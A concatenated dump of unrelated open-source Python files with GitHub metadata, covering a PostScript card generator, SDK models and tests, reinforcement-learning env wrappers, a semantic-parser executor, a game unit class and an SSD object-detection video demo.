""" Supports Postscript description of a single page. """
def __init__(self):
self.page_ps = ""
self.page_path = ""
self.card = PsCard()
def cards_to_ps(self, lines):
""" Can tile cards to page if TEMPLATE_ROWS and TEMPLATE_COLS > 1 """
for row in range(0, TEMPLATE_ROWS):
for col in range(0, TEMPLATE_COLS):
x = TEMPLATE_MARGIN_LEFT + col * CARD_WIDTH
y = TEMPLATE_MARGIN_BOTTOM + row * CARD_HEIGHT
self.card_to_ps(lines, x, y)
def card_to_ps(self, lines, x, y):
lines.append(gsave())
lines.append(translate(x, y))
self.card.to_ps(lines)
lines.append(grestore())
lines.append("\n")
def to_ps(self):
lines = []
lines.append(PS_PROLOG)
self.cards_to_ps(lines)
lines.append(PS_EPILOG)
return "\n".join(lines)
######################################################################
OUTPUT_DIR = "C:\\"
PSCARD_PS = "ps_indexcard.ps"
PSCARD_PDF = "ps_indexcard.pdf"
def test_page():
page = PsPage()
ps = page.to_ps()
ps_path = os.path.join(OUTPUT_DIR, PSCARD_PS)
with open(ps_path, "w") as out:
out.write(ps)
pdf_path = os.path.join(OUTPUT_DIR, PSCARD_PDF)
gs_ps2pdf(ps_path, pdf_path)
pdfview(pdf_path)
######################################################################
if __name__ == "__main__":
test_page()
| {
"content_hash": "8f1c483f47f7e2a832a77fb3236e1a78",
"timestamp": "",
"source": "github",
"line_count": 362,
"max_line_length": 82,
"avg_line_length": 27.19889502762431,
"alnum_prop": 0.5621572212065814,
"repo_name": "ActiveState/code",
"id": "deca16c036a44334841dc8651185110361957b61",
"size": "9846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipes/Python/579136_Roll_your_own_Postscript_code/recipe-579136.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "35894"
},
{
"name": "C",
"bytes": "56048"
},
{
"name": "C++",
"bytes": "90880"
},
{
"name": "HTML",
"bytes": "11656"
},
{
"name": "Java",
"bytes": "57468"
},
{
"name": "JavaScript",
"bytes": "181218"
},
{
"name": "PHP",
"bytes": "250144"
},
{
"name": "Perl",
"bytes": "37296"
},
{
"name": "Perl 6",
"bytes": "9914"
},
{
"name": "Python",
"bytes": "17387779"
},
{
"name": "Ruby",
"bytes": "40233"
},
{
"name": "Shell",
"bytes": "190732"
},
{
"name": "Tcl",
"bytes": "674650"
}
],
"symlink_target": ""
} |
from msrest.serialization import Model
class NextHopResult(Model):
"""The information about next hop from the specified VM.
:param next_hop_type: Next hop type. Possible values include: 'Internet',
'VirtualAppliance', 'VirtualNetworkGateway', 'VnetLocal',
'HyperNetGateway', 'None'
:type next_hop_type: str or
~azure.mgmt.network.v2016_09_01.models.NextHopType
:param next_hop_ip_address: Next hop IP Address
:type next_hop_ip_address: str
:param route_table_id: The resource identifier for the route table
associated with the route being returned. If the route being returned does
not correspond to any user created routes then this field will be the
string 'System Route'.
:type route_table_id: str
"""
_attribute_map = {
'next_hop_type': {'key': 'nextHopType', 'type': 'str'},
'next_hop_ip_address': {'key': 'nextHopIpAddress', 'type': 'str'},
'route_table_id': {'key': 'routeTableId', 'type': 'str'},
}
def __init__(self, next_hop_type=None, next_hop_ip_address=None, route_table_id=None):
super(NextHopResult, self).__init__()
self.next_hop_type = next_hop_type
self.next_hop_ip_address = next_hop_ip_address
self.route_table_id = route_table_id
| {
"content_hash": "a08d5f3705644ab62137d36bd9426f44",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 90,
"avg_line_length": 41.483870967741936,
"alnum_prop": 0.661741835147745,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "645ae73c45193a76a70ef822e89b726efe2b7286",
"size": "1760",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2016_09_01/models/next_hop_result.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
"""This example displays all available content categories.
Tags: contentCategories.list
"""
__author__ = ('api.jimper@gmail.com (Jonathon Imperiosi)')
import argparse
import sys
from apiclient import sample_tools
from oauth2client import client
# Declare command-line flags.
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'profile_id', type=int,
help='The ID of the profile to look up content categories for')
def main(argv):
# Authenticate and construct service.
service, flags = sample_tools.init(
argv, 'dfareporting', 'v2.0', __doc__, __file__, parents=[argparser],
scope=['https://www.googleapis.com/auth/dfareporting',
'https://www.googleapis.com/auth/dfatrafficking'])
profile_id = flags.profile_id
try:
# Construct the request.
request = service.contentCategories().list(profileId=profile_id)
while True:
# Execute request and print response.
response = request.execute()
for category in response['contentCategories']:
print ('Found content category with ID %s and name "%s".'
% (category['id'], category['name']))
if response['contentCategories'] and response['nextPageToken']:
request = service.contentCategories().list_next(request, response)
else:
break
except client.AccessTokenRefreshError:
print ('The credentials have been revoked or expired, please re-run the '
'application to re-authorize')
if __name__ == '__main__':
main(sys.argv)
| {
"content_hash": "98a2462cdb5330088de378316513bb78",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 77,
"avg_line_length": 29,
"alnum_prop": 0.6811971372804164,
"repo_name": "vanant/googleads-dfa-reporting-samples",
"id": "49bc8730adc882d0417850298bcac447dc68dc02",
"size": "2155",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/v2.0/get_content_categories.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C#",
"bytes": "414621"
},
{
"name": "CSS",
"bytes": "2434"
},
{
"name": "Java",
"bytes": "379788"
},
{
"name": "PHP",
"bytes": "401830"
},
{
"name": "Python",
"bytes": "346799"
},
{
"name": "Ruby",
"bytes": "154945"
}
],
"symlink_target": ""
} |
import numpy as np
import itertools
from gym import Env
from gym.spaces import Box
from gym.spaces import Discrete
from collections import deque
class ProxyEnv(Env):
def __init__(self, wrapped_env):
self._wrapped_env = wrapped_env
self.action_space = self._wrapped_env.action_space
self.observation_space = self._wrapped_env.observation_space
@property
def wrapped_env(self):
return self._wrapped_env
def reset(self, **kwargs):
return self._wrapped_env.reset(**kwargs)
def step(self, action):
return self._wrapped_env.step(action)
def render(self, *args, **kwargs):
return self._wrapped_env.render(*args, **kwargs)
@property
def horizon(self):
return self._wrapped_env.horizon
def terminate(self):
if hasattr(self.wrapped_env, "terminate"):
self.wrapped_env.terminate()
def __getattr__(self, attr):
if attr == '_wrapped_env':
raise AttributeError()
return getattr(self._wrapped_env, attr)
def __getstate__(self):
"""
This is useful to override in case the wrapped env has some funky
__getstate__ that doesn't play well with overriding __getattr__.
The main problematic case is/was gym's EzPickle serialization scheme.
:return:
"""
return self.__dict__
def __setstate__(self, state):
self.__dict__.update(state)
def __str__(self):
return '{}({})'.format(type(self).__name__, self.wrapped_env)
class HistoryEnv(ProxyEnv, Env):
def __init__(self, wrapped_env, history_len):
super().__init__(wrapped_env)
self.history_len = history_len
high = np.inf * np.ones(
self.history_len * self.observation_space.low.size)
low = -high
self.observation_space = Box(low=low,
high=high,
)
self.history = deque(maxlen=self.history_len)
def step(self, action):
state, reward, done, info = super().step(action)
self.history.append(state)
flattened_history = self._get_history().flatten()
return flattened_history, reward, done, info
def reset(self, **kwargs):
state = super().reset()
self.history = deque(maxlen=self.history_len)
self.history.append(state)
flattened_history = self._get_history().flatten()
return flattened_history
def _get_history(self):
observations = list(self.history)
obs_count = len(observations)
for _ in range(self.history_len - obs_count):
dummy = np.zeros(self._wrapped_env.observation_space.low.size)
observations.append(dummy)
return np.c_[observations]
class DiscretizeEnv(ProxyEnv, Env):
def __init__(self, wrapped_env, num_bins):
super().__init__(wrapped_env)
low = self.wrapped_env.action_space.low
high = self.wrapped_env.action_space.high
action_ranges = [
np.linspace(low[i], high[i], num_bins)
for i in range(len(low))
]
self.idx_to_continuous_action = [
np.array(x) for x in itertools.product(*action_ranges)
]
self.action_space = Discrete(len(self.idx_to_continuous_action))
def step(self, action):
continuous_action = self.idx_to_continuous_action[action]
return super().step(continuous_action)
class NormalizedBoxEnv(ProxyEnv):
"""
Normalize action to in [-1, 1].
Optionally normalize observations and scale reward.
"""
def __init__(
self,
env,
reward_scale=1.,
obs_mean=None,
obs_std=None,
):
ProxyEnv.__init__(self, env)
self._should_normalize = not (obs_mean is None and obs_std is None)
if self._should_normalize:
if obs_mean is None:
obs_mean = np.zeros_like(env.observation_space.low)
else:
obs_mean = np.array(obs_mean)
if obs_std is None:
obs_std = np.ones_like(env.observation_space.low)
else:
obs_std = np.array(obs_std)
self._reward_scale = reward_scale
self._obs_mean = obs_mean
self._obs_std = obs_std
ub = np.ones(self._wrapped_env.action_space.shape)
self.action_space = Box(-1 * ub, ub)
def estimate_obs_stats(self, obs_batch, override_values=False):
if self._obs_mean is not None and not override_values:
raise Exception("Observation mean and std already set. To "
"override, set override_values to True.")
self._obs_mean = np.mean(obs_batch, axis=0)
self._obs_std = np.std(obs_batch, axis=0)
def _apply_normalize_obs(self, obs):
return (obs - self._obs_mean) / (self._obs_std + 1e-8)
def step(self, action):
lb = self._wrapped_env.action_space.low
ub = self._wrapped_env.action_space.high
scaled_action = lb + (action + 1.) * 0.5 * (ub - lb)
scaled_action = np.clip(scaled_action, lb, ub)
wrapped_step = self._wrapped_env.step(scaled_action)
next_obs, reward, done, info = wrapped_step
if self._should_normalize:
next_obs = self._apply_normalize_obs(next_obs)
return next_obs, reward * self._reward_scale, done, info
def __str__(self):
return "Normalized: %s" % self._wrapped_env
| {
"content_hash": "104751587cd230695f47dc7c05e7b325",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 77,
"avg_line_length": 32.680473372781066,
"alnum_prop": 0.585732391816042,
"repo_name": "vitchyr/rlkit",
"id": "ba83fe95cb66fdcdc8d209d69688052784225e87",
"size": "5523",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rlkit/envs/wrappers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "3338"
},
{
"name": "Python",
"bytes": "355210"
}
],
"symlink_target": ""
} |
import logging
import os
import time
from typing import Optional
import unittest
from slack_sdk.web.slack_response import SlackResponse
from slack_sdk.errors import SlackApiError
from integration_tests.env_variable_names import (
SLACK_SDK_TEST_CONNECT_INVITE_SENDER_BOT_TOKEN,
SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_TOKEN,
SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_USER_ID,
)
from integration_tests.helpers import async_test
from slack_sdk.web import WebClient
from slack_sdk.web.async_client import AsyncWebClient
class TestWebClient(unittest.TestCase):
"""Runs integration tests with Slack API for conversations.* endpoints
To run, we use two workspace-level bot tokens,
one for the inviting workspace(list and send invites) another for the recipient
workspace (accept and approve) sent invites. Before being able to run this test suite,
we also need to have manually created a slack connect shared channel and added
these two bots as members first. See: https://api.slack.com/apis/connect
In addition to conversations.connect:* scopes, your sender bot token should have channels:manage scopes.
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.sender_bot_token = os.environ[
SLACK_SDK_TEST_CONNECT_INVITE_SENDER_BOT_TOKEN
]
self.receiver_bot_token = os.environ[
SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_TOKEN
]
self.sender_sync_client: WebClient = WebClient(token=self.sender_bot_token)
self.sender_async_client: AsyncWebClient = AsyncWebClient(
token=self.sender_bot_token
)
self.receiver_sync_client: WebClient = WebClient(token=self.receiver_bot_token)
self.receiver_async_client: AsyncWebClient = AsyncWebClient(
token=self.receiver_bot_token
)
def tearDown(self):
pass
def test_sync(self):
sender = self.sender_sync_client
receiver = self.receiver_sync_client
channel_id: Optional[str] = None
try:
# list senders pending connect invites
connect_invites: SlackResponse = sender.conversations_listConnectInvites()
self.assertIsNotNone(connect_invites["invites"])
# creates channel in sender workspace to share
unique_channel_name = str(int(time.time())) + "-shared"
new_channel: SlackResponse = sender.conversations_create(
name=unique_channel_name
)
self.assertIsNotNone(new_channel["channel"])
self.assertIsNotNone(new_channel["channel"]["id"])
channel_id = new_channel["channel"]["id"]
# send an invite for sender's intended shared channel to receiver's bot user id
invite: SlackResponse = sender.conversations_inviteShared(
channel=new_channel["channel"]["id"],
user_ids=os.environ[SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_USER_ID],
)
self.assertIsNotNone(invite["invite_id"])
# receiver accept conversations invite via invite id
accepted: SlackResponse = receiver.conversations_acceptSharedInvite(
channel_name=unique_channel_name,
invite_id=invite["invite_id"],
)
self.assertIsNone(accepted["error"])
# receiver attempt to approve invite already accepted by an admin level token should fail
self.assertRaises(
SlackApiError,
receiver.conversations_approveSharedInvite,
invite_id=invite["invite_id"],
)
finally:
if channel_id is not None:
# clean up created channel
delete_channel: SlackResponse = sender.conversations_archive(
channel=new_channel["channel"]["id"]
)
self.assertIsNotNone(delete_channel)
@async_test
async def test_async(self):
sender = self.sender_async_client
receiver = self.receiver_async_client
channel_id: Optional[str] = None
try:
# list senders pending connect invites
connect_invites: SlackResponse = (
await sender.conversations_listConnectInvites()
)
self.assertIsNotNone(connect_invites["invites"])
# creates channel in sender workspace to share
unique_channel_name = str(int(time.time())) + "-shared"
new_channel: SlackResponse = await sender.conversations_create(
name=unique_channel_name
)
self.assertIsNotNone(new_channel["channel"])
self.assertIsNotNone(new_channel["channel"]["id"])
channel_id = new_channel["channel"]["id"]
# send an invite for sender's intended shared channel to receiver's bot user id
invite: SlackResponse = await sender.conversations_inviteShared(
channel=new_channel["channel"]["id"],
user_ids=os.environ[SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_USER_ID],
)
self.assertIsNotNone(invite["invite_id"])
# receiver accept conversations invite via invite id
accepted: SlackResponse = await receiver.conversations_acceptSharedInvite(
channel_name=unique_channel_name,
invite_id=invite["invite_id"],
)
self.assertIsNone(accepted["error"])
# receiver attempt to approve invite already accepted by an admin level token should fail
with self.assertRaises(SlackApiError):
await receiver.conversations_approveSharedInvite(
invite_id=invite["invite_id"]
)
finally:
if channel_id is not None:
# clean up created channel
delete_channel: SlackResponse = await sender.conversations_archive(
channel=new_channel["channel"]["id"]
)
self.assertIsNotNone(delete_channel)
| {
"content_hash": "dfca7d8c075517ee2a80ee86ef43b556",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 108,
"avg_line_length": 42.541666666666664,
"alnum_prop": 0.6297747306562194,
"repo_name": "slackapi/python-slackclient",
"id": "740b7201afd1d3addab4f2dfa94f5793fce2b2ad",
"size": "6126",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "integration_tests/web/test_conversations_connect.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7756"
},
{
"name": "HTML",
"bytes": "5961"
},
{
"name": "Makefile",
"bytes": "7656"
},
{
"name": "Python",
"bytes": "360940"
},
{
"name": "Shell",
"bytes": "110"
}
],
"symlink_target": ""
} |
from gtd.utils import cached_property
from strongsup.executor import Executor, Denotation
from strongsup.rlong.value import RLongStateValue
from strongsup.rlong.state import RLongObject
################################
# Denotation
class RLongDenotation(tuple, Denotation):
"""A pretty lightweight class representing the intermediate denotation."""
__slots__ = ()
def __new__(self, world_state, command_history, execution_stack):
"""Create a new RLongDenotation.
Args:
world_state (RLongState): Current states of the objects
command_history (list[tuple]): List of actions and arguments
execution_stack (list[object]): Used for building arguments for the next action
"""
return tuple.__new__(RLongDenotation, (world_state, command_history, execution_stack))
@property
def world_state(self):
return self[0]
@property
def command_history(self):
return self[1]
@property
def execution_stack(self):
return self[2]
@property
def utterance_idx(self):
return len(self[1])
################################
# Executor
class RLongExecutor(Executor):
"""Stack-based executor for alchemy, scene, and tangrams domains.
"""
def __init__(self, initial_state, debug=False):
self.initial_state = initial_state
self.debug = debug
def execute(self, y_toks, old_denotation=None):
"""Return the intermediate denotation of the formula.
Args:
y_toks (list[Predicate]): the formula fragment to be executed
old_denotation (Denotation): If specified, continue execution
from this intermediate denotation.
Returns:
Denotation
The denotation is not finalized.
Throws:
Exception if the formula is malformed.
"""
if not old_denotation:
denotation = RLongDenotation(self.initial_state, [], [])
else:
assert isinstance(old_denotation, tuple)
denotation = RLongDenotation(
old_denotation.world_state,
old_denotation.command_history,
old_denotation.execution_stack[:])
if self.debug:
print 'Executing: {} (old deno: {})'.format(y_toks, denotation)
for predicate in y_toks:
denotation = self.apply(predicate.name, denotation)
if self.debug:
print predicate, denotation
return denotation
def execute_predicate(self, predicate, old_denotation=None):
if not old_denotation:
denotation = RLongDenotation(self.initial_state, [], [])
else:
assert isinstance(old_denotation, tuple)
denotation = RLongDenotation(
old_denotation.world_state,
old_denotation.command_history,
old_denotation.execution_stack[:])
return self.apply(predicate.name, denotation)
STACK_NOT_EMPTY = ValueError('Cannot finalize: Stack not empty')
def finalize(self, denotation):
"""Return the finalized denotation as list[Value].
Return None if the denotation cannot be finalized.
For rlong domain, a denotation can be finalized if the stack is empty.
The result will be a list of a single RLongValue.
"""
if denotation.execution_stack:
raise RLongExecutor.STACK_NOT_EMPTY
return [RLongStateValue(denotation.world_state)]
################################
# Apply
def apply(self, name, denotation):
"""Return a new denotation.
The execution stack can be modified directly.
But the world state and command history cannot be modified directly;
a new Denotation object must be created.
This happens only when an action is performed.
Args:
name (str): The next predicate name
denotation (RLongDenotation): Current denotation
Returns:
RLongDenotation
can be the same object as the input argument
if only the execution stack is modified
"""
if len(name) == 1 and name[0].isalpha():
# Color: Push onto the stack
denotation.execution_stack.append(name)
return denotation
elif name[0] == '-' or name[0].isdigit():
# Number: Push onto the stack
denotation.execution_stack.append(int(name))
return denotation
elif name[0] == 'X':
# Fraction: Push onto the stack
denotation.execution_stack.append(name)
return denotation
elif name == 'all-objects':
# All objects: Push onto the stack
denotation.execution_stack.append(denotation.world_state.all_objects)
return denotation
elif name[0] == 'P':
# Property: Join with the value
value = denotation.execution_stack.pop()
result = denotation.world_state.apply_join(value, name[1:])
assert result, 'Empty result'
denotation.execution_stack.append(result)
return denotation
elif name[0] == 'D':
# Double-Property: Join with the values
value2 = denotation.execution_stack.pop()
value1 = denotation.execution_stack.pop()
result = denotation.world_state.apply_double_join(
value1, value2, name[1:])
assert result, 'Empty result'
denotation.execution_stack.append(result)
return denotation
elif name[0] == 'A':
# Perform action
new_state, history_entry = denotation.world_state.apply_action(
name[1:], denotation.execution_stack)
return RLongDenotation(new_state,
denotation.command_history + [history_entry],
denotation.execution_stack)
elif name == 'index':
# Perform indexing on a list of objects
number = denotation.execution_stack.pop()
assert isinstance(number, int)
objects = denotation.execution_stack.pop()
assert isinstance(objects, list)
if number > 0:
# Because the LF uses 1-based indexing
denotation.execution_stack.append(objects[number - 1])
else:
# Negative indices: count from the right
denotation.execution_stack.append(objects[number])
return denotation
elif name[0] == 'H':
# History slot
number = denotation.execution_stack.pop()
assert isinstance(number, int)
# Pull out the argument
command = denotation.command_history[
number - 1 if number > 0 else number]
if name == 'H0':
# Get the action and execute
argument = command[0]
new_state, history_entry = denotation.world_state.apply_action(
argument, denotation.execution_stack)
return RLongDenotation(new_state,
denotation.command_history + [history_entry],
denotation.execution_stack)
elif name == 'HUndo':
# Get the opposite and execute
argument = denotation.world_state.reverse_action(command[0])
new_state, history_entry = denotation.world_state.apply_action(
argument, denotation.execution_stack)
return RLongDenotation(new_state,
denotation.command_history + [history_entry],
denotation.execution_stack)
else:
# Just push onto the stack
argument = command[int(name[1:])]
if not isinstance(argument, (int, str)):
assert isinstance(argument, RLongObject)
argument = denotation.world_state.resolve_argument(argument)
denotation.execution_stack.append(argument)
return denotation
else:
raise ValueError('Unknown predicate {}'.format(name))
| {
"content_hash": "ade68966cc8100ca84d35e36ee372a76",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 94,
"avg_line_length": 39.645933014354064,
"alnum_prop": 0.5806179097272508,
"repo_name": "kelvinguu/lang2program",
"id": "19b9a65e4dce0757b670b94f952c772c49ba4cea",
"size": "8286",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "strongsup/rlong/executor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "462998"
}
],
"symlink_target": ""
} |
import glob
import sys
from pythonwarrior.units.base import UnitBase
from pythonwarrior.units.golem import Golem
class Warrior(UnitBase):
def __init__(self, level=None):
super(Warrior, self).__init__()
self.level = level
self.player_attr = None
self.name_attr = None
self.score = 0
self.golem_abilities = []
self.max_health = 20
def play_turn(self, turn):
return self.player().play_turn(turn)
def player(self):
if self.level.player_path() not in sys.path:
sys.path.insert(0, self.level.player_path())
if glob.glob(self.level.player_path() + '/player.py'):
import player
if self.player_attr:
return self.player_attr
else:
self.player_attr = player.Player()
return self.player_attr
def earn_points(self, points):
self.score = self.score + points
print "earns %d points" % points
@property
def attack_power(self):
return 5
@property
def shoot_power(self):
return 3
def name(self):
if self.name_attr:
return self.name_attr
else:
return 'Warrior'
def __repr__(self):
return self.name()
@property
def character(self):
return "@"
def perform_turn(self):
if self.current_turn.action is None:
self.say('does nothing')
super(Warrior, self).perform_turn()
def add_golem_abilities(self, *abilities):
self.golem_abilities += abilities
def has_golem(self):
if self.golem_abilities:
return True
else:
return False
def base_golem(self):
golem = Golem()
golem.add_abilities(*self.golem_abilities)
return golem
| {
"content_hash": "83d9fca184857bc5ada78a4a1ff3bafb",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 62,
"avg_line_length": 23.92105263157895,
"alnum_prop": 0.5737073707370737,
"repo_name": "arbylee/python-warrior",
"id": "ddb958f708b095de85a71e897a06b9d49c124f9d",
"size": "1818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pythonwarrior/units/warrior.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "123534"
}
],
"symlink_target": ""
} |
from riskytt import RiskyTT
from charm.toolbox.pairinggroup import PairingGroup,GT,G1,G2,pair
import util
import random
import time
from multiprocessing.dummy import Pool as ThreadPool
def avg_measurement(n, m, num_threads, measure, fn, rand_args):
pool = ThreadPool(num_threads)
f = lambda x: measure(fn, *(rand_args()))
v = [0]*n
try:
expts = [pool.map(f, v)] * m
except Exception:
expts = [map(f,v)] * m
means = map(util.mean, expts)
mins = map(min, expts)
return min(mins), util.median(means)
def time_fn(fn, *args):
before = time.time()
fn(*args)
after = time.time()
return (after - before)* 1000
if __name__=="__main__":
n = 100
m = 10
num_threads = 1
def avg_time(fn, rand_args):
return avg_measurement(n, m, num_threads, time_fn, fn, rand_args)
def avg_size(fn, rand_args):
return avg_measurement(n, m, num_threads, lambda f,*args: f(*args), fn, rand_args)
largest_k = 0
num_users = largest_k
keygen_times = []
encpk_times = []
encsk_times = []
dec_times = []
ct_sizes = []
group = PairingGroup("BN254")
# pairing time
rand_args_pair = lambda: [group.random(G1), group.random(G2)]
m,t = avg_time(pair, rand_args_pair)
print "Pairing min: ",
print m,
print "Pairing avg: ",
print t
for k in range(1,largest_k + 1):
riskytt = RiskyTT(group, num_users, k)
# KeyGen
rand_args_keygen = lambda: [random.randint(0, num_users - 1)]
t = avg_time(riskytt._keygen, rand_args_keygen)
keygen_times.append(t)
# Enc-PK
rand_args_encpk = lambda: [group.random(GT)]
t = avg_time(riskytt.encpk, rand_args_encpk)
encpk_times.append(t)
# Enc-SK
#rand_args_encsk = lambda: [group.random(GT), random.randint(0, num_users - 1)]
#t = avg_time(riskytt.encsk, rand_args_encsk)
#encsk_times.append(t)
# Dec
rand_args_dec = lambda: [riskytt._keygen(random.randint(0, num_users - 1)), riskytt.encpk(group.random(GT))]
t = avg_time(riskytt.dec, rand_args_dec)
dec_times.append(t)
# CT Size
rand_args_ct = lambda: []
s = avg_size(riskytt.mhve.ct_size, rand_args_ct)
ct_sizes.append(s)
print "KeyGen: ",
print keygen_times
print "Enc-PK: ",
print encpk_times
print "Enc-SK: ",
print encsk_times
print "Dec: ",
print dec_times
print "CT Size: ",
print ct_sizes
| {
"content_hash": "8a8640552bbeb7c75c1e075fdd3312dd",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 116,
"avg_line_length": 27.47826086956522,
"alnum_prop": 0.5882120253164557,
"repo_name": "ahrussell/riskytraitortracing",
"id": "ceb5391978d37a79cff168f2de4ff54574eb4cba",
"size": "2528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "benchmark.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "11795"
},
{
"name": "C++",
"bytes": "43373"
},
{
"name": "Makefile",
"bytes": "434"
},
{
"name": "Python",
"bytes": "9695"
},
{
"name": "TeX",
"bytes": "15777"
}
],
"symlink_target": ""
} |
"""Diagnostics support for Coinbase."""
from homeassistant.components.diagnostics import async_redact_data
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_API_TOKEN, CONF_ID
from homeassistant.core import HomeAssistant
from . import CoinbaseData
from .const import API_ACCOUNT_AMOUNT, API_RESOURCE_PATH, CONF_TITLE, DOMAIN
TO_REDACT = {
API_ACCOUNT_AMOUNT,
API_RESOURCE_PATH,
CONF_API_KEY,
CONF_API_TOKEN,
CONF_ID,
CONF_TITLE,
}
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, entry: ConfigEntry
) -> dict:
"""Return diagnostics for a config entry."""
instance: CoinbaseData = hass.data[DOMAIN][entry.entry_id]
return async_redact_data(
{
"entry": entry.as_dict(),
"accounts": instance.accounts,
},
TO_REDACT,
)
| {
"content_hash": "558e582d2081534ebefbc8a6f9fbd25b",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 76,
"avg_line_length": 26.818181818181817,
"alnum_prop": 0.6915254237288135,
"repo_name": "mezz64/home-assistant",
"id": "54d4168776c52fbd2341c18902a80fcbac91eb5b",
"size": "885",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/coinbase/diagnostics.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
from carrot.messaging import Consumer
from conductor.task import Task
__all__ = ["ConsumerTask"]
class ConsumerTask(Task):
def __init__(self, bus=None):
Task.__init__(self, bus)
def start(self):
Task.start(self)
start.priority = 12
def stop(self):
Task.start(self)
stop.priority = 88
def start_task(self):
self.bus.log("Starting AMQP consumer provider task")
self.bus.subscribe("get-amqp-consumer", self.get_consumer)
def stop_task(self):
self.bus.log("Stopping AMQP consumer provider task")
self.bus.unsubscribe("get-amqp-consumer", self.get_consumer)
def get_consumer(self, broker, **kwargs):
return Consumer(broker, **kwargs)
| {
"content_hash": "56d1f350465b5def3344bd5912a6f357",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 68,
"avg_line_length": 28,
"alnum_prop": 0.6243386243386243,
"repo_name": "Lawouach/conductor",
"id": "c1ba0625e6755b8a2c53eead24a3e847bd14d2b8",
"size": "780",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conductor/protocol/amqp/consumer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import matplotlib.pyplot as plt
import numpy as np
import cv2
from utils.data_management import get_class_names
from utils.preprocessing import substract_mean
from utils.inference import detect
from utils.inference import plot_detections
class VideoDemo(object):
def __init__(self, prior_boxes, dataset_name='VOC2007',
box_scale_factors=[.1, .1, .2, .2],
background_index=0, lower_probability_threshold=.1,
iou_threshold=.2, class_names=None):
self.prior_boxes = prior_boxes
self.box_scale_factors = box_scale_factors
self.background_index = background_index
self.iou_threshold = iou_threshold
self.lower_probability_threshold = lower_probability_threshold
self.class_names = class_names
if self.class_names is None:
self.class_names = get_class_names(dataset_name)
self.num_classes = len(self.class_names)
self.colors = plt.cm.hsv(np.linspace(0, 1, self.num_classes)).tolist()
self.colors = np.asarray(self.colors) * 255
self.arg_to_class = dict(zip(list(range(self.num_classes)),
self.class_names))
self.font = cv2.FONT_HERSHEY_SIMPLEX
def start_video(self, model):
camera = cv2.VideoCapture(0)
while True:
frame = camera.read()[1]
if frame is None:
print('Frame: None')
continue
image_array = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image_array = cv2.resize(image_array, (300, 300))
image_array = substract_mean(image_array)
image_array = np.expand_dims(image_array, 0)
predictions = model.predict(image_array)
detections = detect(predictions, self.prior_boxes)
plot_detections(detections, frame, 0.6,
self.arg_to_class, self.colors)
cv2.imshow('webcam', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
camera.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
from models import SSD300
from utils.boxes import create_prior_boxes
from utils.boxes import to_point_form
dataset_name = 'VOC2007'
weights_path = '../trained_models/SSD300_weights.hdf5'
model = SSD300(weights_path=weights_path)
prior_boxes = to_point_form(create_prior_boxes())
video = VideoDemo(prior_boxes, dataset_name)
video.start_video(model)
| {
"content_hash": "60cece068d4d639f02414a5bc6f8d6e1",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 78,
"avg_line_length": 38.61538461538461,
"alnum_prop": 0.6151394422310758,
"repo_name": "oarriaga/single_shot_multibox_detector",
"id": "fc036e6cbbc1eb326aa502e2df63bfd262c8acc4",
"size": "2510",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/video_demo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "145563"
}
],
"symlink_target": ""
} |
"""Create / interact with Google Cloud Translation connections."""
from google.cloud import _http
from google.cloud.translate_v2 import __version__
_CLIENT_INFO = _http.CLIENT_INFO_TEMPLATE.format(__version__)
class Connection(_http.JSONConnection):
"""A connection to Google Cloud Translation API via the JSON REST API.
